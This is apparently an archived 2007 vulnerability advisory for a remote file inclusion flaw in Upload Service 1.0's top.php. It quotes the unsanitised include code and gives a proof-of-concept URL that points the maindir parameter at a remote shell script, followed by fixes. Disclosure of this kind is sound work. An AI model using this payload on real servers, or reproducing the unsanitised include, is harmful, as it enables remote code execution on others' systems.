Upload Service 1.0 (top.php maindir) Remote File Inclusion Vulnerability

------------------------------------------------------------------------------------ [ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion ------------------------------------------------------------------------------------ Author : Ahmad Muammar W.K (a.k.a) y3dips Date Found : January, 21st 2007 Location : Indonesia, Jakarta web : http://echo.or.id/adv/adv62-y3dips-2007.txt Critical Lvl : Critical ------------------------------------------------------------------------------------ Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Upload Service version : 1.0 URL : http://bild-bearbeiten.de/ Download-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip --------------------------------------------------------------------------- 1. Install directory are not being remove after installation process 2. Variables "$maindir" in top.php are not properly sanitized. ---------------top.php-------------------------------- ... include($maindir."config.php"); include($maindir."functions/error.php"); ... ------------------------------------------------------------------ When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. Poc/Exploit: ~~~~~~~~~ http://127.0.0.1/upload/top.php?maindir=http://127.0.0.1/shell.php? Solution: ~~~~~~ - Remember to remove your install directory and change config.php permission - Simply Sanitize variable $maindir on affected files. (eg. $maindir=" ";) - Turn off register_globals Notification: ~~~~~~~~~ vendor not contact yet --------------------------------------------------------------------------- Shoutz: ~~~~ ~ my lovely ana ~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff ~ newbie_hacker@yahoogroups.com ~ #e-c-h-o @irc.dal.net --------------------------------------------------------------------------- Contact: ~~~~~ y3dips|| echo|staff || y3dips[at]gmail[dot]com Homepage: http://y3dips.echo.or.id/ -------------------------------- [ EOF ] ---------------------------------- # milw0rm.com [2007-01-21]